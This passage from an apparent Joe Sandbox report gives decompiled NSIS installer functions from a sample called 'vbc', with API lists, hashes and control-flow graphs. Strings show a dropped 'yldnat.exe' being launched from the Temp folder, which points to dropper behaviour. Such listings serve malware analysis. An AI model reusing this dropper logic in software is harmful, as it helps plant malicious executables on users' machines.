                                                        						_t66 = E004069A4(_t81);
                                                        						_t79 = 0;
                                                        						__eflags = _t66 - _t77;
                                                        						if(_t66 != _t77) {
                                                        							_t73 = _t66 + 0x14;
                                                        							__eflags = _t73;
                                                        							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                        						}
                                                        						asm("sbb eax, eax");
                                                        						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                        						__eflags = _t72;
                                                        						 *(_t86 + 8) = _t72;
                                                        					}
                                                        					__eflags =  *(_t86 + 8) - _t77;
                                                        					if( *(_t86 + 8) == _t77) {
                                                        						E00406139(_t81);
                                                        					}
                                                        					__eflags =  *(_t86 + 8) - 1;
                                                        					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                        					__eflags = _t43 - 0xffffffff;
                                                        					 *(_t86 - 0x38) = _t43;
                                                        					if(_t43 != 0xffffffff) {
                                                        						break;
                                                        					}
                                                        					__eflags =  *(_t86 + 8) - _t77;
                                                        					if( *(_t86 + 8) != _t77) {
                                                        						E004056D0(0xffffffe2,  *(_t86 - 8));
                                                        						__eflags =  *(_t86 + 8) - 2;
                                                        						if(__eflags == 0) {
                                                        							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                        						}
                                                        						L31:
                                                        						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
                                                        						__eflags =  *0x7a8b28;
                                                        						goto L32;
                                                        					} else {
                                                        						E0040666E(0x40b5f8, _t83);
                                                        						E0040666E(_t83, _t81);
                                                        						E004066AB(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                                                        						E0040666E(_t83, 0x40b5f8);
                                                        						_t64 = E00405CCE("C:\Users\Albus\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                                                        						__eflags = _t64;
                                                        						if(_t64 == 0) {
                                                        							continue;
                                                        						} else {
                                                        							__eflags = _t64 == 1;
                                                        							if(_t64 == 1) {
                                                        								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
                                                        								L32:
                                                        								_t51 = 0;
                                                        								__eflags = 0;
                                                        							} else {
                                                        								_push(_t81);
                                                        								_push(0xfffffffa);
                                                        								E004056D0();
                                                        								L29:
                                                        								_t51 = 0x7fffffff;
                                                        							}
                                                        						}
                                                        					}
                                                        					L33:
                                                        					return _t51;
                                                        				}
                                                        				E004056D0(0xffffffea,  *(_t86 - 8));
                                                        				 *0x7a8b54 =  *0x7a8b54 + 1;
                                                        				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                        				 *0x7a8b54 =  *0x7a8b54 - 1;
                                                        				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                        				_t84 = _t45;
                                                        				if( *(_t86 - 0x24) != 0xffffffff) {
                                                        					L22:
                                                        					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                        				} else {
                                                        					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                        					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                        						goto L22;
                                                        					}
                                                        				}
                                                        				CloseHandle( *(_t86 - 0x38)); // executed
                                                        				__eflags = _t84 - _t77;
                                                        				if(_t84 >= _t77) {
                                                        					goto L31;
                                                        				} else {
                                                        					__eflags = _t84 - 0xfffffffe;
                                                        					if(_t84 != 0xfffffffe) {
                                                        						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
                                                        					} else {
                                                        						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                        						lstrcatW(_t81,  *(_t86 - 8));
                                                        					}
                                                        					_push(0x200010);
                                                        					_push(_t81);
                                                        					E00405CCE();
                                                        					goto L29;
                                                        				}
                                                        				goto L33;
                                                        			}

                                                        APIs
                                                        • lstrcatW.KERNEL32 ref: 004017B0
                                                        • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000000,00000000,C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,007B4000,?,?,00000031), ref: 004017D5
                                                          • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                                                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                                          • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
                                                          • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
                                                        • API String ID: 1941528284-2387052581
                                                        • Opcode ID: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                                                        • Instruction ID: c895feda3e823d9c0bc0fb7144dfd3dc41df657037fc16576ccee127d24ab7e8
                                                        • Opcode Fuzzy Hash: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                                                        • Instruction Fuzzy Hash: CB41D571800108BACF11BBB5DD85DAE7679EF45328F20463FF422B11E1DB3D89619A2E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 521 4069cb-4069eb GetSystemDirectoryW 522 4069ed 521->522 523 4069ef-4069f1 521->523 522->523 524 406a02-406a04 523->524 525 4069f3-4069fc 523->525 527 406a05-406a38 wsprintfW LoadLibraryExW 524->527 525->524 526 4069fe-406a00 525->526 526->527
                                                        C-Code - Quality: 100%
                                                        			E004069CB(intOrPtr _a4) {
                                                        				short _v576;
                                                        				signed int _t13;
                                                        				struct HINSTANCE__* _t17;
                                                        				signed int _t19;
                                                        				void* _t24;
                                                        
                                                        				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                        				if(_t13 > 0x104) {
                                                        					_t13 = 0;
                                                        				}
                                                        				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                        					_t19 = 1;
                                                        				} else {
                                                        					_t19 = 0;
                                                        				}
                                                        				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                        				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                        				return _t17;
                                                        			}

                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                                                        • wsprintfW.USER32 ref: 00406A1D
                                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%S.dll$UXTHEME$\
                                                        • API String ID: 2200240437-1946221925
                                                        • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                        • Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
                                                        • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                        • Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 528 40347f-4034a7 GetTickCount 529 4035d7-4035df call 40302e 528->529 530 4034ad-4034d8 call 4035fe SetFilePointer 528->530 535 4035e1-4035e5 529->535 536 4034dd-4034ef 530->536 537 4034f1 536->537 538 4034f3-403501 call 4035e8 536->538 537->538 541 403507-403513 538->541 542 4035c9-4035cc 538->542 543 403519-40351f 541->543 542->535 544 403521-403527 543->544 545 40354a-403566 call 406b96 543->545 544->545 546 403529-403549 call 40302e 544->546 551 4035d2 545->551 552 403568-403570 545->552 546->545 553 4035d4-4035d5 551->553 554 403572-40357a call 406210 552->554 555 403593-403599 552->555 553->535 559 40357f-403581 554->559 555->551 556 40359b-40359d 555->556 556->551 558 40359f-4035b2 556->558 558->536 560 4035b8-4035c7 SetFilePointer 558->560 561 403583-40358f 559->561 562 4035ce-4035d0 559->562 560->529 561->543 563 403591 561->563 562->553 563->558
                                                        C-Code - Quality: 93%
                                                        			E0040347F(intOrPtr _a4) {
                                                        				intOrPtr _t11;
                                                        				signed int _t12;
                                                        				void* _t15;
                                                        				long _t16;
                                                        				void* _t18;
                                                        				intOrPtr _t30;
                                                        				intOrPtr _t33;
                                                        				intOrPtr _t35;
                                                        				void* _t36;
                                                        				intOrPtr _t48;
                                                        
                                                        				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
                                                        				 *0x7a8aac = GetTickCount() + 0x1f4;
                                                        				if(_t33 <= 0) {
                                                        					L22:
                                                        					E0040302E(1);
                                                        					return 0;
                                                        				}
                                                        				E004035FE( *0x79f744);
                                                        				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                        				 *0x79f740 = _t33;
                                                        				 *0x79f730 = 0;
                                                        				while(1) {
                                                        					_t30 = 0x4000;
                                                        					_t11 =  *0x79f738 -  *0x79f744;
                                                        					if(_t11 <= 0x4000) {
                                                        						_t30 = _t11;
                                                        					}
                                                        					_t12 = E004035E8(0x793730, _t30);
                                                        					if(_t12 == 0) {
                                                        						break;
                                                        					}
                                                        					 *0x79f744 =  *0x79f744 + _t30;
                                                        					 *0x40ce68 = 0x793730;
                                                        					 *0x40ce6c = _t30;
                                                        					L6:
                                                        					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
                                                        						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
                                                        						E0040302E(0);
                                                        					}
                                                        					 *0x40ce70 = 0x78b730;
                                                        					 *0x40ce74 = 0x8000;
                                                        					if(E00406B96(?str?) < 0) {
                                                        						goto L20;
                                                        					}
                                                        					_t35 =  *0x40ce70; // 0x78f2a8
                                                        					_t36 = _t35 - 0x78b730;
                                                        					if(_t36 == 0) {
                                                        						__eflags =  *0x40ce6c; // 0x0
                                                        						if(__eflags != 0) {
                                                        							goto L20;
                                                        						}
                                                        						__eflags = _t30;
                                                        						if(_t30 == 0) {
                                                        							goto L20;
                                                        						}
                                                        						L16:
                                                        						_t16 =  *0x79f734;
                                                        						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                        							continue;
                                                        						}
                                                        						SetFilePointer( *0x40a01c, _t16, 0, 0);
                                                        						goto L22;
                                                        					}
                                                        					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
                                                        					if(_t18 == 0) {
                                                        						_push(0xfffffffe);
                                                        						L21:
                                                        						_pop(_t15);
                                                        						return _t15;
                                                        					}
                                                        					 *0x40ce60 =  *0x40ce60 + _t36;
                                                        					_t48 =  *0x40ce6c; // 0x0
                                                        					if(_t48 != 0) {
                                                        						goto L6;
                                                        					}
                                                        					goto L16;
                                                        					L20:
                                                        					_push(0xfffffffd);
                                                        					goto L21;
                                                        				}
                                                        				return _t12 | 0xffffffff;
                                                        			}

                                                        Instruction addresses (listing order): 0x0040348f, 0x004034a2, 0x004034a7, 0x004035d7, 0x004035d9, 0x00000000, 0x004035df, 0x004034b3, 0x004034c6, 0x004034cc, 0x004034d2, 0x004034dd, 0x004034e2, 0x004034e7, 0x004034ef, 0x004034f1, 0x004034f1, 0x004034fa, 0x00403501, 0x00000000, 0x00000000, 0x00403507, 0x0040350d, 0x00403513, 0x00000000, 0x00403519, 0x0040351f, 0x0040353f, 0x00403544, 0x00403549, 0x0040354f, 0x00403555, 0x00403566, 0x00000000, 0x00000000, 0x00403568, 0x0040356e, 0x00403570, 0x00403593, 0x00403599, 0x00000000, 0x00000000, 0x0040359b, 0x0040359d, 0x00000000, 0x00000000, 0x0040359f, 0x0040359f, 0x004035b2, 0x00000000, 0x00000000, 0x004035c1, 0x00000000, 0x004035c1, 0x0040357a, 0x00403581, 0x004035ce, 0x004035d4, 0x004035d4, 0x00000000, 0x004035d4, 0x00403583, 0x00403589, 0x0040358f, 0x00000000, 0x00000000, 0x00000000, 0x004035d2, 0x004035d2, 0x00000000, 0x004035d2, 0x00000000

                                                        APIs
                                                        • GetTickCount.KERNEL32(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 00403493
                                                          • Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,pky,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FilePointer$CountTick
                                                        • String ID: 07y$pky
                                                        • API String ID: 1092082344-214164554
                                                        • Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                                                        • Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
                                                        • Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                                                        • Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 564 405b9f-405bea CreateDirectoryW 565 405bf0-405bfd GetLastError 564->565 566 405bec-405bee 564->566 567 405c17-405c19 565->567 568 405bff-405c13 SetFileSecurityW 565->568 566->567 568->566 569 405c15 GetLastError 568->569 569->567
                                                        C-Code - Quality: 100%
                                                        			E00405B9F(WCHAR* _a4) {
                                                        				struct _SECURITY_ATTRIBUTES _v16;
                                                        				struct _SECURITY_DESCRIPTOR _v36;
                                                        				int _t22;
                                                        				long _t23;
                                                        
                                                        				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                        				_v36.Owner = 0x4083f8;
                                                        				_v36.Group = 0x4083f8;
                                                        				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                        				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                        				_v16.lpSecurityDescriptor =  &_v36;
                                                        				_v36.Revision = 1;
                                                        				_v36.Control = 4;
                                                        				_v36.Dacl = 0x4083e8;
                                                        				_v16.nLength = 0xc;
                                                        				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                        				if(_t22 != 0) {
                                                        					L1:
                                                        					return 0;
                                                        				}
                                                        				_t23 = GetLastError();
                                                        				if(_t23 == 0xb7) {
                                                        					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                        						goto L1;
                                                        					}
                                                        					return GetLastError();
                                                        				}
                                                        				return _t23;
                                                        			}

                                                        Instruction addresses (listing order): 0x00405baa, 0x00405bae, 0x00405bb1, 0x00405bb7, 0x00405bbb, 0x00405bbf, 0x00405bc7, 0x00405bce, 0x00405bd4, 0x00405bdb, 0x00405be2, 0x00405bea, 0x00405bec, 0x00000000, 0x00405bec, 0x00405bf6, 0x00405bfd, 0x00405c13, 0x00000000, 0x00000000, 0x00000000, 0x00405c15, 0x00405c19

                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                                                        • GetLastError.KERNEL32 ref: 00405BF6
                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
                                                        • GetLastError.KERNEL32 ref: 00405C15
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 3449924974-4017390910
                                                        • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                        • Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
                                                        • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                        • Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 570 40618d-406199 571 40619a-4061ce GetTickCount GetTempFileNameW 570->571 572 4061d0-4061d2 571->572 573 4061dd-4061df 571->573 572->571 574 4061d4 572->574 575 4061d7-4061da 573->575 574->575
                                                        C-Code - Quality: 100%
                                                        			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                        				intOrPtr _v8;
                                                        				short _v12;
                                                        				short _t12;
                                                        				intOrPtr _t13;
                                                        				signed int _t14;
                                                        				WCHAR* _t17;
                                                        				signed int _t19;
                                                        				signed short _t23;
                                                        				WCHAR* _t26;
                                                        
                                                        				_t26 = _a4;
                                                        				_t23 = 0x64;
                                                        				while(1) {
                                                        					_t12 =  *L"nsa"; // 0x73006e
                                                        					_t23 = _t23 - 1;
                                                        					_v12 = _t12;
                                                        					_t13 =  *0x40a5ac; // 0x61
                                                        					_v8 = _t13;
                                                        					_t14 = GetTickCount();
                                                        					_t19 = 0x1a;
                                                        					_v8 = _v8 + _t14 % _t19;
                                                        					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                        					if(_t17 != 0) {
                                                        						break;
                                                        					}
                                                        					if(_t23 != 0) {
                                                        						continue;
                                                        					} else {
                                                        						 *_t26 =  *_t26 & _t23;
                                                        					}
                                                        					L4:
                                                        					return _t17;
                                                        				}
                                                        				_t17 = _t26;
                                                        				goto L4;
                                                        			}

                                                        Instruction addresses (listing order): 0x00406193, 0x00406199, 0x0040619a, 0x0040619a, 0x0040619f, 0x004061a0, 0x004061a3, 0x004061a8, 0x004061ab, 0x004061b5, 0x004061c2, 0x004061c6, 0x004061ce, 0x00000000, 0x00000000, 0x004061d2, 0x00000000, 0x004061d4, 0x004061d4, 0x004061d4, 0x004061d7, 0x004061da, 0x004061da, 0x004061dd, 0x00000000

                                                        APIs
                                                        • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061AB
                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-4262883142
                                                        • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                        • Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
                                                        • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                        • Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 576 403377-403384 577 4033a2-4033ab call 40347f 576->577 578 403386-40339c SetFilePointer 576->578 581 4033b1-4033c4 call 4061e1 577->581 582 403479-40347c 577->582 578->577 585 403469 581->585 586 4033ca-4033dd call 40347f 581->586 588 40346b-40346c 585->588 590 4033e3-4033e6 586->590 591 403477 586->591 588->582 592 403445-40344b 590->592 593 4033e8-4033eb 590->593 591->582 594 403450-403467 ReadFile 592->594 595 40344d 592->595 593->591 596 4033f1 593->596 594->585 597 40346e-403471 594->597 595->594 598 4033f6-403400 596->598 597->591 599 403402 598->599 600 403407-403419 call 4061e1 598->600 599->600 600->585 603 40341b-403422 call 406210 600->603 605 403427-403429 603->605 606 403441-403443 605->606 607 40342b-40343d 605->607 606->588 607->598 608 40343f 607->608 608->591
                                                        C-Code - Quality: 92%
                                                        			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                        				long _v8;
                                                        				long _t21;
                                                        				long _t22;
                                                        				void* _t24;
                                                        				long _t26;
                                                        				int _t27;
                                                        				long _t28;
                                                        				void* _t30;
                                                        				long _t31;
                                                        				long _t32;
                                                        				long _t36;
                                                        
                                                        				_t21 = _a4;
                                                        				if(_t21 >= 0) {
                                                        					_t32 = _t21 +  *0x7a8af8;
                                                        					 *0x79f734 = _t32;
                                                        					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                        				}
                                                        				_t22 = E0040347F(4);
                                                        				if(_t22 >= 0) {
                                                        					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed
                                                        					if(_t24 == 0) {
                                                        						L18:
                                                        						_push(0xfffffffd);
                                                        						goto L19;
                                                        					} else {
                                                        						 *0x79f734 =  *0x79f734 + 4;
                                                        						_t36 = E0040347F(_a4);
                                                        						if(_t36 < 0) {
                                                        							L21:
                                                        							_t22 = _t36;
                                                        						} else {
                                                        							if(_a12 != 0) {
                                                        								_t26 = _a4;
                                                        								if(_t26 >= _a16) {
                                                        									_t26 = _a16;
                                                        								}
                                                        								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
